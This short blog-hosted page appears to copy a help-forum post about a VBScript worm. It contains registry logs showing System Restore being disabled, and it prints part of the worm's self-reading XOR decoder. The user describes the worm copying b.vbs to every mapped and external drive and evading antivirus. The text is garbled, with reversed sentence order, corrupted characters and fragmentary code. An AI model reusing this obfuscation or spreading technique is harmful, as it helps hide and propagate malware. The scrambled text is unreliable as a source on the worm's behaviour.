ertp.blogg.se

, HKLM\SOFTWARE\WOW6432NODE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE|DisableConfig, 1, Good: (0), Bad: (1),Replaced, , HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE|DisableConfig, 1, Good: (0), Bad: (1),Replaced, , HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\ASSOCIATIONS|LowRiskFileTypes. Set filesys1 = CreateObject("Scripting.FileSystemObject")įor iiiii = 16 to 17 step 1 : SUGGU = Replace(Split(QJYEK(), VbCrlf)(iiiii), "REM *?:!","") : SYGYM = SYGYM & SUGGU : NextĪAA = Replace(NetworkFix(SYGYM, 1), "", "1")įunction QJYEK() : Set F = CreateObject("Scripting.FileSystemObject") : M = F.OpenTextFile(WScript.ScriptFullName,1).ReadAll : QJYEK = M : End Functionįunction NetworkFix(byval Data, byval opennp)įor i = 1 to len(Data) : a= i mod len(opennp): if a = 0 then a = len(opennp) : NetworkFix = NetworkFix & chr(asc(mid(opennp,a,1)) xor asc(mid(Data,i,1))) MCSHIELD detected the virus please see below. I reinfected this pc as I manually removed the virus.Īfter executing the file the following happensī.vbs is copied to each drive mapped and external.Ĭ:\Users\Administrator\AppData\Roaming\winsc32Īnd also the SystemInfon folder is created on each mapped and external drive containing the b.vbs script.ĮSET does not detect the virus nor does Malware. I also have the virus if you would like me to copy it. Herewith the logs as requested, including the vbs script